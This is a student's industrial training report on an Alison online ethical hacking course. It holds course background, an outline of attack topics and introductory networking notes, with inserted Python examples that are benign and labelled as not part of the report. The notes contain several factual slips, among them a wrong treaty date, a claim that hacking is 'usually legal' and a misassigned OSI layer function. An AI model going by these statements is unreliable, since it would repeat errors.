Lucknow Institute of Technology, Lucknow
INDUSTRIAL TRAINING REPORT ON
Ethical hacking
SUBMITTED IN PARTIAL FULFILLMENT FOR THE AWARD OF THE
DEGREE OF BACHELOR OF TECHNOLOGY
IN
COMPUTER SCIENCE & ENGINEERING
SUBMITTED BY
Nitesh Kumar Dubey
B.Tech VII Semester
1836210903
Training taken under
ONLINE TRAINING INSTITUTE
2020-21
ACKNOWLEDGMENT
The internship opportunity I had with ALISON Online Training Institute was a great chance
for learning and professional development. Therefore, I consider myself a very lucky
individual, as I was provided with an opportunity to be a part of it. I am also grateful for having
a chance to meet so many wonderful professionals who led me through this internship period.
Bearing in mind the above, I am using this opportunity to express my deepest gratitude and
special thanks to the MD of Alison Online Trainings who, in spite of being extraordinarily busy
with his/her duties, took time out to hear, guide and keep me on the correct path, for allowing
me to carry out my project at their esteemed organization and for extending support during the training.
I express my deepest thanks to Prof. Indranil Sengupta, Ethical Hacking and Security
Department, for taking part in useful decisions, giving necessary advice and guidance and
arranging all facilities to make life easier. I choose this moment to acknowledge his
contribution gratefully.
It is my radiant sentiment to place on record my best regards and deepest sense of gratitude to
Mr. Mike Feerick, founder and CEO of Alison, and Mr. Indranil Sengupta, industrial training
and project guide, for their careful and precious guidance, which was extremely valuable for
my study both theoretically and practically.
I perceive this opportunity as a big milestone in my career development. I will strive to use
the gained skills and knowledge in the best possible way, and I will continue to work on their
improvement in order to attain my desired career objectives. I hope to continue cooperation with
all of you in the future.
Sincerely,
Nitesh Kumar Dubey
Place: Lucknow
Date:
DECLARATION
I, Nitesh Kumar Dubey, hereby declare that the training report work entitled
“ETHICAL HACKING” submitted to LUCKNOW INSTITUTE OF TECHNOLOGY,
LUCKNOW is in partial fulfillment of the requirement for the award of the
Bachelor of Technology in Computer Science and Engineering under the
guidance of Alison Online Training Institute. I further declare that the
work reported in this project has not been submitted and will not be
submitted for the award of any other degree or diploma in this institute.
Place: Lucknow
Date:
Signature of Student
Nitesh Kumar Dubey
1836210903
CERTIFICATE
Certified that this Industrial Training Report titled “ETHICAL HACKING” is
the bona fide work of Mr. Nitesh Kumar Dubey, who carried out the training
work under my supervision. Certified further that, to the best of my knowledge,
the work reported herein does not form part of any other project report or
dissertation on the basis of which a degree or award was conferred on an earlier
occasion on this or any other candidate.
Mrs. Arifa Khan
Head of Department
Computer Science and Engineering

Prof. Indranil Sengupta
IIT Kharagpur
Internship Coordinator
TABLE OF CONTENTS
Serial No.   Description                              Page No.
1            Title Page                               1
2            Acknowledgment                           2
3            Declaration                              3
4            Certificate                              4
5            Table of Contents                        5
6            Industrial Overview                      6 - 7
7            History and Development of Company       8 - 9
8            Training Objective                       10
9            Courses Outline                          11 - 62
10           Conclusion                               63
11           References                               64
INDUSTRIAL OVERVIEW
Alison is one of the world’s largest free learning platforms for education and skills training. It is
a for-profit social enterprise dedicated to making it possible for anyone, to study anything,
anywhere, at any time, for free online, at any subject level. Through our mission we are a catalyst
for positive social change, creating opportunity, prosperity, and equality for everyone.
Alison was founded in Galway, Ireland, in 2007 and has grown organically to become a major
force in free online education and skills training. Today, with more than 18 million learners in 195
countries, Alison is changing how the world learns and up-skills.
We are committed to equality and access to education and skills training irrespective of gender,
geography, economic status or any other barriers that can so often stunt potential. So we offer
a range of free courses that meet the many diverse needs of our learners. The UN declared in
Article 26 of the 1946 Declaration of Human Rights that “Education shall be free…”. This
statement will always inspire us.
Alison was founded by Alison CEO, Mike Feerick. Mike is a businessman, but one with a
difference. He believes in social impact, and that you can build a financially successful business
focused on meeting a huge global social need, making education and skills training more
accessible for everyone. He invites anyone who believes that too, to support the Alison mission.
Alison is free of charge to you. But it’s still a business – albeit a socially-focused one. We are a
social enterprise making our money through advertising, merchandise, and the sale of
Certificates and Diplomas, should a graduate choose to buy one.
Alison Learning Centers
For many around the world, online learning is inaccessible. Millions are still without internet
access, need assistance with computers, and advice on how to start and maintain their online
education. Alison Learning Centers [ALCs] are an initiative for directly confronting these
challenges.
At an ALC, those without direct access to online learning, or who need or can benefit from
technical or learning support, can find the facilities, community, and support they need. ALCs
enable learners to study on Alison online as part of a group, to avail of off-line tutor assistance,
or to simply receive encouragement and advice on how to begin the exciting lifelong journey of
online education and skills training.
Focusing on certified learning with proctored assessments, the ALC program also aims, where
possible, to empower learners by introducing career opportunities to program participants. ALC
managers reach out to local employers to explore options for finding work placement and
employment opportunities for ALC graduates. Combined, these career opportunities, online
education access, support, and encouragement make real differences to participants’ personal
and professional confidence and employability. Through this program, Alison also actively
delivers against the UN’s Sustainable Development Goals.
What you will find at an Alison Learning Centre
A safe, secure & serviced location to study
Qualified learning facilitators
Proctored learning certification services
A community of learners
Support to put learning into practice
Hear directly from ALC Graduates about how learning at an ALC has empowered their lives
and the people and communities around them.
At Alison Learning Centers, you can register to do a Certificate or Diploma course or
a Learning Path using the ALC’s computers and internet connection.
You can avail of technical and learning support provided by qualified learning administrators,
and enjoy the social environment provided by the center.
You will receive a certificate/diploma on attainment of a score of 80% or more in your final
proctored assessment.
You will gain access to information and guidance on how to use what you have learnt to
improve your livelihood.
And if you complete the course in the specified time, the cost of the entire service is less than
what you would pay for a PDF download of a certificate/diploma if you were to purchase these
directly on the Alison platform.
HISTORY AND DEVELOPMENT OF ALISON
In 2005, while server and broadband costs were decreasing and webpages were becoming more
monetizable, Mike Feerick realized that free education could be provided online as a scalable
business. In 2006, Feerick developed the platform and designed it. On 21 April 2007, Alison was
launched with its first free customer and six courses. Among Alison's stated aims are to drive all
costs of accessing digitally-based education and skills training to zero and to bring disruptive
innovation to global education and skills training through a scalable business model which
enables registered users to be educated for free. In April 2017, the company decided to make a
technical overhaul of the platform. The company also launched its mobile application, which
drives 50% of the website's traffic worldwide.
On 5 July 2016, President Pranab Mukherjee of India announced the partnership between Alison
and the National Skill Development Corporation.
Products and services
Business model
Alison's income is generated from advertising and sales of certificates. According to The
Economist, the company seeks to drive education through advertising in the manner of television
and radio. Through the online pay-per-click advertising revenue model, Alison has founded a
business model through which it can provide learning materials at no cost to the learner. It aims to make
learning accessible to blue-collar or "bottom of the pyramid" learners.
Courses
Alison currently offers more than a thousand courses at certificate, diploma, and learning path
levels across nine core subject categories. The certificate level courses require two to three
hours of study while the more rigorous diploma level courses require ten to fifteen hours of
study. There is no time limit for completing a course. One of Alison's courses is ABC IT, a fifteen
to twenty-hour training suite which is cited by The New York Times as "covering similar ground"
to the International Computer Driving License without the cost of certification. In 2020, Alison
published a course on the coronavirus and translated it into more than languages.
Accreditation
According to the Alison website,
Alison is currently accredited by CPD UK Continuing professional development.
https://cpduk.co.uk/directory/profile/capernaum-ltd-alison-com
https://alison.com/about/accreditation
Reception
Alison was among the four winners of the 2010 UNESCO King Hamad bin Isa Al Khalifa Prize,
a prize for innovation in ICT for education. In October 2013, Alison won an award at the World
Innovation Summit for Education held in Qatar. Since 2013 Alison courses have become
generally recognized by many employers, particularly in occupations and disciplines where no
external certification by professional bodies post-graduation exists. It is estimated that currently
over 1.5 million people around the world have an Alison course on their CV.
David Bornstein of The New York Times noted that "practical skills training is usually
expensive." Initially some observers also predicted the ineffectiveness of the MOOC model in
delivering real educational impact, highlighting the lack of personal interaction with educators
and the high drop-out rate of users with no incentive to commit without any material investment
of their own.
Training Objective
The objectives of industrial training are:
To provide students the opportunity to test their interest in a particular career
before permanent commitments are made.
To develop skills in the application of theory to practical work situations.
To develop skills and techniques directly applicable to their careers.
Internships will increase a student's sense of responsibility and good work
habits.
To expose students to real work environment experience and gain knowledge in
writing reports on technical works/projects.
Internship students will have higher levels of academic performance.
Internship programs will increase student earning potential upon graduation.
To build strength, teamwork spirit and self-confidence in students' lives.
To enhance students' creativity skills and ability to share ideas.
To build good communication skills with groups of workers and learn
proper behavior of corporate life in the industrial sector.
Students will be instilled with good moral values such as responsibility,
commitment and trustworthiness during their training.
COURSES OUTLINE
Ethical hacking and basic concept of Networking
IP Addressing and Routing
Routing Protocol
Scanning
Enumeration
System hacking
Trojan and backdoors
Sniffers
Denial of Service
Hacking web servers
Web application Vulnerabilities
Web-based Password Cracking techniques
SQL Injection
Hacking wireless Networks
Virus and worms
Physical Security
Linux Hacking
Evading IDS, Firewalls, and Honey-pots
Buffer Overflows
Cryptography
Penetration Testing
Ethical hacking and basic concept of networking
Introduction of Ethical hacking
Hacking has been a part of computing for almost five decades and it is a very broad discipline,
which covers a wide range of topics. The first known event of hacking took place in 1960
at MIT, and at the same time the term "Hacker" originated.
Hacking is the act of finding the possible entry points that exist in a computer system or a
computer network and finally entering into them. Hacking is usually done to gain unauthorized
access to a computer system or a computer network, either to harm the systems or to steal
sensitive information available on the computer.
Hacking is usually legal as long as it is being done to find weaknesses in a computer or network
system for testing purpose. This sort of hacking is what we call Ethical Hacking.
A computer expert who does the act of hacking is called a "Hacker". Hackers are those who
seek knowledge, to understand how systems operate, how they are designed, and then attempt
to play with these systems.
Types of hacking
Website Hacking − Hacking a website means taking unauthorized control over a web
server and its associated software such as databases and other interfaces.
Network Hacking − Hacking a network means gathering information about a network by
using tools like Telnet, NS lookup, Ping, Tracert, Netstat, etc. with the intent to harm the
network system and hamper its operation.
Email Hacking − It includes getting unauthorized access on an Email account and using
it without taking the consent of its owner.
Ethical Hacking − Ethical hacking involves finding weaknesses in a computer or network
system for testing purpose and finally getting them fixed.
Password Hacking − This is the process of recovering secret passwords from data that
has been stored in or transmitted by a computer system.
Computer Hacking − This is the process of stealing computer ID and password by
applying hacking methods and getting unauthorized access to a computer system.
Purpose of Hacking
There could be various positive and negative intentions behind performing hacking activities.
Here is a list of some probable reasons why people indulge in hacking activities −
Just for fun
Show-off
Steal important information
Damaging the system
Hampering privacy
Money extortion
System security testing
To break policy compliance
Hackers
A hacker is an unauthorized person who can access computer data or information without the
owner's permission. Hackers are those who seek knowledge, to understand how systems operate,
how they are designed, and then attempt to play with these systems.
The Role of security and penetration testers
Script kiddies or packet monkeys
Young or inexperienced hackers.
Copy code and techniques from knowledgeable hackers.
Experienced penetration testers write programs or scripts using
Perl, C, C++, Python, JavaScript, Visual Basic, SQL and many other languages.
Penetration testing Methodologies
Tiger Box
Collection of operating systems and hacking tools.
Usually on laptops.
Helps penetration testers and security testers conduct vulnerability
assessments and attacks.
White Box model
Tester is told everything about the network topology and technology.
Tester is authorized to interview IT personnel and company employees.
Makes the tester's job a little easier.
Black Box model
Tester is not given details about the network.
Burden is on the tester to find the details.
Gray Box model
Hybrid of the white and black box models.
Company gives the tester partial information.
What can we do legally?
Laws involving technology change as rapidly as technology itself.
Find out what is legal for you locally.
Laws change from place to place.
Be aware of what is allowed and what is not allowed.
Laws of the Land
# Tools on your computer might be illegal to possess.
# Contact local law enforcement agencies before installing hacking tools.
# Written words are open to interpretation.
# Governments are getting more serious about punishment for cybercrimes.
What can we not do legally?
o Accessing a computer without permission is illegal.
o Other illegal actions:
Installing worms or viruses.
Denial of Service attacks.
Denying users access to network resources.
o Be careful that your actions do not prevent customers from doing their jobs.
Ethical Hacking in a Nutshell
What does it take to be a security tester?
Knowledge of network and computer technology.
Ability to communicate with management and IT personnel.
Understanding of the law.
Ability to use the necessary tools (may be purchased or made).
Basic concepts of networking
Computer Networks:
A communication system for connecting computers/hosts.
Why is it needed?
Better connectivity
Better communication
Better sharing of resources
Bringing people together
Types of Networks:
Local area network (LAN) {faster, cheaper, 10 Mbps, Ethernet}
Connects hosts within a relatively small geographical area.
Same room
Same building
Same campus
A local area network (LAN) is a group of computers and peripheral devices that share
a common communications line or wireless link to a server within a distinct
geographic area. A local area network may serve as few as two or three users in a
home-office or several hundred users in a corporation's central office.
Wide area Network (WAN) {slower, expensive}
Hosts may be widely dispersed
Across Campuses.
Across city/ country/continents
A wide area network (WAN) is a telecommunications network that extends over a
large geographic area for the primary purpose of computer networking. Wide area
networks are often established with leased telecommunication circuits.
Data communication over a network
Broadly two Approaches:
Circuit switching
Packet switching
Circuit Switching
A dedicated communication path is established between two stations
The path follows a fixed sequence of intermediate links.
A logical channel gets defined on each physical link,
dedicated to the connection.
[Figure: a circuit-switched path made up of 4 dedicated links]
Three steps are required for communication
Connection establishment:
Required before data transmission
Data transfer:
Can Proceed at maximum Speed.
Connection termination:
Required after the data transmission is over.
For deallocation of network resources.
Packet switching {used in the modern world}
Modern form of long-distance data communication.
Network resources are not dedicated.
A link can be shared.
The basic technology has evolved over time.
The basic concept has remained the same.
Data are transmitted in short packets (~k bytes).
A longer message is broken into smaller chunks.
The chunks are called packets.
Every packet contains a header.
Packet switching is based on the store-and-forward concept.
Each intermediate network node receives a whole packet,
decides the route,
and forwards the packet along the selected route.
Each intermediate node (router) maintains a routing table.
Two alternative approaches are used for packet transmission:
Virtual circuits
Datagram approach
Virtual circuit approach
Similar in concept to circuit switching.
A route is established before packet transmission starts.
All packets follow the same path.
The links comprising the path are not dedicated.
Different from circuit switching in this respect.
Working technique in the virtual circuit approach
Route is established a priori.
Packets are forwarded from one node to the next using the store-and-forward scheme.
Only the virtual circuit number needs to be carried by a packet.
Each intermediate node maintains a table
created during route establishment
and used for packet forwarding.
No dynamic routing decision is taken by the intermediate nodes.
Congestion Control in Virtual Circuits:
Once congestion is detected in a virtual circuit network, closed-loop techniques are used.
There are different approaches in this technique:
No new connections –
No new connections are established when congestion is detected. This approach is
used in telephone networks, where no new calls are established when the exchange is
overloaded.
Congested router excluded from new routes –
Another approach to control congestion is to allow all new connections but route these new
connections in such a way that the congested router is not part of the route.
Negotiation –
Different parameters are negotiated between the sender and receiver of the network when the
connection is established. During the set-up time, the host specifies the shape and volume
of the traffic, quality of service and other parameters.
Datagram Approaches
No route is established beforehand
Each packet is transmitted as an independent entity.
Does not maintain any history {no path is maintained}.
Every intermediate node has to take routing decisions dynamically.
Makes use of a Routing table.
Every packet must contain source and destination address.
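To make the difference between the two approaches concrete, here is an added example (not code from the report or the Alison course) that simulates both over a constructed four-node network: in the virtual-circuit approach a route is installed once and each packet carries only a VC number, while in the datagram approach each packet carries the destination address and every node consults its own routing table. The topology, routing tables and node names are all constructed for this example.

```python
"""Packet switching simulation: virtual-circuit vs datagram forwarding.

Added example (not code from the report or from the Alison course) over a
constructed four-node network. In the virtual-circuit approach a route is set
up once and each node stores (previous node, incoming VC number) ->
(next node, outgoing VC number), so a packet carries only a VC number.
In the datagram approach there is no setup: every packet carries the
destination address and each node consults its own routing table.
"""
from dataclasses import dataclass, field

# Constructed topology: undirected links between nodes A, B, C, D.
LINKS = {("A", "B"), ("B", "C"), ("C", "D"), ("A", "C")}


def has_link(a: str, b: str) -> bool:
    return (a, b) in LINKS or (b, a) in LINKS


@dataclass
class Node:
    name: str
    routes: dict = field(default_factory=dict)    # datagram table: destination -> next hop
    vc_table: dict = field(default_factory=dict)  # VC table: (prev node, in VC) -> (next node, out VC)
    next_vc: int = 0

    def alloc_vc(self) -> int:
        """Hand out a VC number that is unique on this node's incoming links."""
        self.next_vc += 1
        return self.next_vc


def build_network() -> dict:
    nodes = {n: Node(n) for n in "ABCD"}
    # Constructed static routing tables (next hop for each destination).
    nodes["A"].routes = {"B": "B", "C": "C", "D": "C"}
    nodes["B"].routes = {"A": "A", "C": "C", "D": "C"}
    nodes["C"].routes = {"A": "A", "B": "B", "D": "D"}
    nodes["D"].routes = {"A": "C", "B": "C", "C": "C"}
    return nodes


def setup_virtual_circuit(nodes: dict, path: list) -> int:
    """Route establishment: install one forwarding entry at every node on the
    path and return the VC number the source stamps on each packet."""
    for a, b in zip(path, path[1:]):
        if not has_link(a, b):
            raise ValueError(f"no link {a}-{b}")
    src_vc = nodes[path[0]].alloc_vc()
    prev, in_vc = None, src_vc              # (None, vc) marks a locally originated packet
    for i, name in enumerate(path):
        node = nodes[name]
        if i == len(path) - 1:
            node.vc_table[(prev, in_vc)] = (None, None)   # end of circuit: deliver locally
        else:
            nxt = path[i + 1]
            out_vc = nodes[nxt].alloc_vc()               # number used on the link to nxt
            node.vc_table[(prev, in_vc)] = (nxt, out_vc)
            prev, in_vc = name, out_vc
    return src_vc


def forward_vc(nodes: dict, src: str, vc: int) -> list:
    """Store-and-forward of a packet carrying only a VC number; no routing
    decision is taken, each node just follows its table. Returns the path."""
    path, prev, current = [src], None, src
    while True:
        nxt, out_vc = nodes[current].vc_table[(prev, vc)]
        if nxt is None:
            return path
        path.append(nxt)
        prev, current, vc = current, nxt, out_vc


def forward_datagram(nodes: dict, src: str, dst: str, max_hops: int = 8) -> list:
    """Each node decides the next hop from the destination address in the packet."""
    path, current = [src], src
    while current != dst:
        if len(path) > max_hops:
            raise RuntimeError("routing loop")     # a misconfigured table shows up here
        current = nodes[current].routes[dst]
        path.append(current)
    return path


if __name__ == "__main__":
    net = build_network()
    vc1 = setup_virtual_circuit(net, ["A", "B", "C", "D"])   # connection pinned to A-B-C-D
    vc2 = setup_virtual_circuit(net, ["A", "C", "D"])        # a second circuit to the same host
    print("VC", vc1, "->", forward_vc(net, "A", vc1))
    print("VC", vc2, "->", forward_vc(net, "A", vc2))
    print("datagram A->D ->", forward_datagram(net, "A", "D"))
```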
Layered Network Architecture
Open System Interconnection (OSI) reference model
OSI (Open System Interconnection) is a reference model that describes how
information from a software application in one computer moves through a physical
medium to the software application in another computer.
OSI consists of seven layers, and each layer performs a particular network function.
OSI model was developed by the International Organization for Standardization (ISO) in
1984, and it is now considered as an architectural model for the inter-computer
communications.
OSI model divides the whole task into seven smaller and manageable tasks. Each layer
is assigned a particular task.
Each layer is self-contained, so that task assigned to each layer can be performed
independently.
Physical Layer:
Transmit raw bit stream over a Physical medium.
Data Link Layer:
Reliable transfer of frames over a point-to-point link (flow control, error control).
Network Layer:
Establishing, maintaining and terminating connections.
Routes packets through point-to-point links.
Transport layer:
End-to-End reliable data transfer, with Error recovery and flow control.
Session Layer:
Manage Sessions.
Presentation Layer:
Provides data independence.
Application Layer:
Interface Point for user applications.
TCP/ IP Architecture
o The TCP/IP model was developed prior to the OSI model.
o The TCP/IP model is not exactly similar to the OSI model.
o The TCP/IP model consists of five layers: the application layer, transport layer, network
layer, data link layer and physical layer.
o The first four layers provide physical standards, network interface, internetworking, and
transport functions that correspond to the first four layers of the OSI model; the remaining
OSI layers are represented in the TCP/IP model by a single layer called the application layer.
o TCP/IP is a hierarchical protocol made up of interactive modules, and each of them provides
specific functionality.
Here, hierarchical means that each upper-layer protocol is supported by two or more lower-level
protocols.
Functions of TCP/IP layers:
Network Access Layer
o The network access layer is the lowest layer of the TCP/IP model.
o It is the combination of the Physical layer and Data Link layer defined in the
OSI reference model.
o It defines how the data should be sent physically through the network.
o This layer is mainly responsible for the transmission of the data between two devices on the
same network.
o The functions carried out by this layer are encapsulating the IP datagram into frames
transmitted by the network and mapping of IP addresses into physical addresses.
o The protocols used by this layer are ethernet, token ring, FDDI, X.25, frame relay.
Internet Layer
o An internet layer is the second layer of the TCP/IP model.
o An internet layer is also known as the network layer.
o The main responsibility of the internet layer is to send the packets from any network, and they
arrive at the destination irrespective of the route they take.
The following protocols are used in this layer:
IP Protocol: IP protocol is used in this layer, and it is the most significant part of the entire
TCP/IP suite.
Following are the responsibilities of this protocol:
o IP Addressing: This protocol implements logical host addresses known as IP addresses. The
IP addresses are used by the internet and higher layers to identify the device and to provide
internetwork routing.
o Host-to-host communication: It determines the path through which the data is to be
transmitted.
o Data Encapsulation and Formatting: An IP protocol accepts the data from the transport
layer protocol. An IP protocol ensures that the data is sent and received securely, it
encapsulates the data into message known as IP datagram.
o Fragmentation and Reassembly: The limit imposed on the size of the IP datagram by data
link layer protocol is known as Maximum Transmission unit (MTU). If the size of IP datagram
is greater than the MTU unit, then the IP protocol splits the datagram into smaller units so that
they can travel over the local network. Fragmentation can be done by the sender or
intermediate router. At the receiver side, all the fragments are reassembled to form an original
message.
o Routing: When IP datagram is sent over the same local network such as LAN, MAN, WAN,
it is known as direct delivery. When source and destination are on the distant network, then
the IP datagram is sent indirectly. This can be accomplished by routing the IP datagram
through various devices such as routers.
ARP Protocol
o ARP stands for Address Resolution Protocol.
o ARP is a network layer protocol which is used to find the physical address from the IP address.
o Two terms are mainly associated with the ARP protocol:
o ARP request: When a sender wants to know the physical address of a device, it broadcasts
an ARP request to the network.
o ARP reply: Every device attached to the network will accept the ARP request and process
it, but only the recipient recognizes the IP address and sends back its physical address
in the form of an ARP reply. The requesting host adds the physical address both to its cache memory
and to the datagram header.
ICMP Protocol
o ICMP stands for Internet Control Message Protocol.
o It is a mechanism used by the hosts or routers to send notifications regarding datagram
problems back to the sender.
o A datagram travels from router-to-router until it reaches its destination. If a router is unable to
route the data because of some unusual conditions such as disabled links, a device is on fire
or network congestion, then the ICMP protocol is used to inform the sender that the datagram
is undeliverable.
o An ICMP protocol mainly uses two terms:
o ICMP Test: ICMP Test is used to test whether the destination is reachable or not.
o ICMP Reply: ICMP Reply is used to check whether the destination device is responding or
not.
o The core responsibility of the ICMP protocol is to report the problems, not correct them. The
responsibility of the correction lies with the sender.
o ICMP can send the messages only to the source, but not to the intermediate routers because
the IP datagram carries the addresses of the source and destination but not of the router that
it is passed to.
Transport Layer
The transport layer is responsible for the reliability, flow control, and correction of data which is
being sent over the network.
The two protocols used in the transport layer are User Datagram protocol and Transmission
control protocol.
o User Datagram Protocol (UDP)
o It provides connectionless service and end-to-end delivery of transmission.
o It is an unreliable protocol, as it discovers errors but does not specify the error.
o User Datagram Protocol discovers the error, and the ICMP protocol reports the error to the sender
that the user datagram has been damaged.
o UDP consists of the following fields:
Source port address: The source port address is the address of the application program that
has created the message.
Destination port address: The destination port address is the address of the application
program that receives the message.
Total length: It defines the total length of the user datagram in bytes.
Checksum: The checksum is a 16-bit field used in error detection.
o UDP does not specify which packet is lost. UDP contains only checksum; it does not contain
any ID of a data segment.
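The four UDP header fields and the 16-bit checksum described above, as an added example (not code from the report or the Alison course): it builds a constructed datagram, parses it, and verifies the checksum over the IPv4 pseudo-header, header and payload as RFC 768 specifies. It also shows the two limits the text hints at: the checksum reports that a datagram is damaged but not where, and a pair of compensating errors passes undetected. The IP addresses, ports and payload are constructed sample values.

```python
"""UDP header parsing and checksum verification over IPv4 (RFC 768).

Added example, not code from the report or the Alison course. A constructed
datagram is built, then parsed; the checksum covers an IPv4 pseudo-header
(source IP, destination IP, zero, protocol 17, UDP length) plus the UDP
header and payload. It shows that the checksum flags a damaged datagram
without saying where the damage is, and that it misses some corruption.
"""
import struct

UDP_PROTO = 17


def ones_complement_sum(data: bytes) -> int:
    """16-bit one's-complement sum with end-around carry; odd length is zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(word for (word,) in struct.iter_unpack("!H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def pseudo_header(src_ip: bytes, dst_ip: bytes, udp_len: int) -> bytes:
    """IPv4 pseudo-header: ties the checksum to the addresses, so a misdelivered datagram fails."""
    return src_ip + dst_ip + struct.pack("!BBH", 0, UDP_PROTO, udp_len)


def udp_checksum(src_ip: bytes, dst_ip: bytes, segment: bytes) -> int:
    """Checksum of a segment whose checksum field is taken as zero."""
    zeroed = segment[:6] + b"\x00\x00" + segment[8:]
    csum = (~ones_complement_sum(pseudo_header(src_ip, dst_ip, len(segment)) + zeroed)) & 0xFFFF
    return csum or 0xFFFF        # a computed 0 is sent as 0xFFFF, since 0 means "no checksum"


def build_udp(src_ip: bytes, dst_ip: bytes, sport: int, dport: int, payload: bytes) -> bytes:
    length = 8 + len(payload)
    header = struct.pack("!HHHH", sport, dport, length, 0)
    csum = udp_checksum(src_ip, dst_ip, header + payload)
    return struct.pack("!HHHH", sport, dport, length, csum) + payload


def parse_udp(src_ip: bytes, dst_ip: bytes, segment: bytes) -> dict:
    """Decode the four header fields and verify the checksum.
    checksum_ok is None when the sender disabled the checksum (field == 0)."""
    if len(segment) < 8:
        raise ValueError("truncated UDP header")
    sport, dport, length, csum = struct.unpack("!HHHH", segment[:8])
    if length != len(segment):
        raise ValueError(f"length field {length} != {len(segment)} bytes received")
    if csum == 0:
        ok = None
    else:
        # Summing the transmitted checksum together with everything it covers must give all ones.
        ok = ones_complement_sum(pseudo_header(src_ip, dst_ip, length) + segment) == 0xFFFF
    return {"src_port": sport, "dst_port": dport, "length": length,
            "checksum": csum, "checksum_ok": ok, "payload": segment[8:]}


def flip_bit(segment: bytes, offset: int, bit: int) -> bytes:
    """Simulate damage in transit: flip one bit of the datagram."""
    b = bytearray(segment)
    b[offset] ^= 1 << bit
    return bytes(b)


# Constructed sample addresses and payload.
SRC_IP = bytes([192, 168, 1, 10])
DST_IP = bytes([192, 168, 1, 20])
SAMPLE = build_udp(SRC_IP, DST_IP, 40000, 53, b"hello udp")

if __name__ == "__main__":
    print(parse_udp(SRC_IP, DST_IP, SAMPLE))
    damaged = flip_bit(SAMPLE, 12, 0)          # one bit in the payload
    print("single bit flip detected:", parse_udp(SRC_IP, DST_IP, damaged)["checksum_ok"] is False)
    # Two compensating errors (+1 in one 16-bit word, -1 in another) are not detected.
    missed = SAMPLE[:9] + b"d" + SAMPLE[10:15] + b"e" + SAMPLE[16:]
    print("compensating errors detected:", parse_udp(SRC_IP, DST_IP, missed)["checksum_ok"])
```

The last case is why a checksum is error detection, not integrity protection: anything that must resist deliberate tampering needs a MAC or signature at a higher layer.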
o Transmission Control Protocol (TCP)
o It provides full transport layer services to applications.
o It creates a virtual circuit between the sender and receiver, and it is active for the duration of
the transmission.
o TCP is a reliable protocol as it detects the error and retransmits the damaged frames.
Therefore, it ensures all the segments must be received and acknowledged before the
transmission is considered to be completed and a virtual circuit is discarded.
o At the sending end, TCP divides the whole message into smaller units known as segment,
and each segment contains a sequence number which is required for reordering the frames
to form an original message.
o At the receiving end, TCP collects all the segments and reorders them based on sequence
numbers.
Application Layer
o An application layer is the topmost layer in the TCP/IP model.
o It is responsible for handling high-level protocols, issues of representation.
o This layer allows the user to interact with the application.
o When one application layer protocol wants to communicate with another application layer, it
forwards its data to the transport layer.
o There is an ambiguity in the application layer. Not every application can be placed
inside the application layer; only those that interact with the communication system belong there. For
example, a text editor cannot be considered part of the application layer, while a web browser
uses the HTTP protocol to interact with the network, where HTTP is an application layer
protocol.
Following are the main protocols used in the application layer:
o HTTP: HTTP stands for Hypertext Transfer Protocol. This protocol allows us to access data
over the World Wide Web. It transfers data in the form of plain text, audio and video. It is known
as a hypertext transfer protocol as it is efficient in a hypertext environment
where there are rapid jumps from one document to another.
o SNMP: SNMP stands for Simple Network Management Protocol. It is a framework used for
managing the devices on the internet by using the TCP/IP protocol suite.
o SMTP: SMTP stands for Simple mail transfer protocol. The TCP/IP protocol that supports the
e-mail is known as a Simple mail transfer protocol. This protocol is used to send the data to
another e-mail address.
o DNS: DNS stands for Domain Name System. An IP address is used to identify the connection
of a host to the internet uniquely. But, people prefer to use the names instead of addresses.
Therefore, the system that maps the name to the address is known as Domain Name System.
o TELNET: It is an abbreviation for Terminal Network. It establishes the connection between
the local computer and remote computer in such a way that the local terminal appears to be
a terminal at the remote system.
o FTP: FTP stands for File Transfer Protocol. FTP is a standard internet protocol used for
transmitting the files from one computer to another computer.
IP ADDRESSING
Basic concept:
Each host connected to the internet is identified by a unique IP address.
An IP address is a 32-bit quantity.
Expressed in dotted-decimal notation w.x.y.z, where dots are used to
separate each of the four octets of the address.
Consists of two logical parts:
a. A network number
b. A host number
This partition defines the IP address classes.
Hierarchical Addressing
A computer on the internet is addressed using a two-tuple:
1. The network number: assigned and managed by a central authority.
2. The host number: assigned and managed by the local network administrator.
When routing a packet to the destination network, only the network number is looked at.
IP ADDRESS CLASSES
There are five defined IP Address Classes.
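As an added example (not from the report), the classful addressing described above in Python: the leading bits of the first octet select the class, which fixes how many bits form the network number and how many the host number, and a routing-style comparison that looks only at the network number. The sample addresses are constructed.

```python
def parse_ipv4(dotted):
    """Convert dotted-decimal w.x.y.z into a 32-bit integer, validating each octet."""
    parts = dotted.split(".")
    if len(parts) != 4:
        raise ValueError("expected four octets: %r" % dotted)
    value = 0
    for octet in parts:
        if not octet.isdigit() or not 0 <= int(octet) <= 255:
            raise ValueError("octet out of range: %r" % octet)
        value = (value << 8) | int(octet)
    return value


def to_dotted(value):
    """Inverse of parse_ipv4."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def classify(dotted):
    """Classful split: class A/B/C give 8/16/24 network bits; D and E have no split."""
    addr = parse_ipv4(dotted)
    first = addr >> 24
    if first & 0x80 == 0:          # 0xxxxxxx -> class A, 8-bit network number
        cls, net_bits = "A", 8
    elif first & 0xC0 == 0x80:     # 10xxxxxx -> class B, 16-bit network number
        cls, net_bits = "B", 16
    elif first & 0xE0 == 0xC0:     # 110xxxxx -> class C, 24-bit network number
        cls, net_bits = "C", 24
    elif first & 0xF0 == 0xE0:     # 1110xxxx -> class D (multicast)
        cls, net_bits = "D", None
    else:                          # 1111xxxx -> class E (reserved)
        cls, net_bits = "E", None

    result = {"address": dotted, "class": cls}
    if net_bits is not None:
        host_bits = 32 - net_bits
        mask = (0xFFFFFFFF << host_bits) & 0xFFFFFFFF
        result["default_mask"] = to_dotted(mask)
        result["network_number"] = to_dotted(addr & mask)      # assigned centrally
        result["host_number"] = addr & ((1 << host_bits) - 1)  # assigned locally
    return result


def same_network(a, b):
    """The forwarding decision compares only the network numbers."""
    ca, cb = classify(a), classify(b)
    return "network_number" in ca and ca["network_number"] == cb.get("network_number")


if __name__ == "__main__":
    # Constructed sample addresses, one per class.
    for ip in ("10.1.2.3", "172.16.5.4", "192.168.1.10", "224.0.0.1", "240.0.0.1"):
        print(classify(ip))
    print(same_network("192.168.1.10", "192.168.1.200"))
```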
In TCP/IP, the transport layer consists of two different protocols:
Transmission Control Protocol (TCP)
User Datagram Protocol (UDP)
Transmission Control Protocol (TCP)
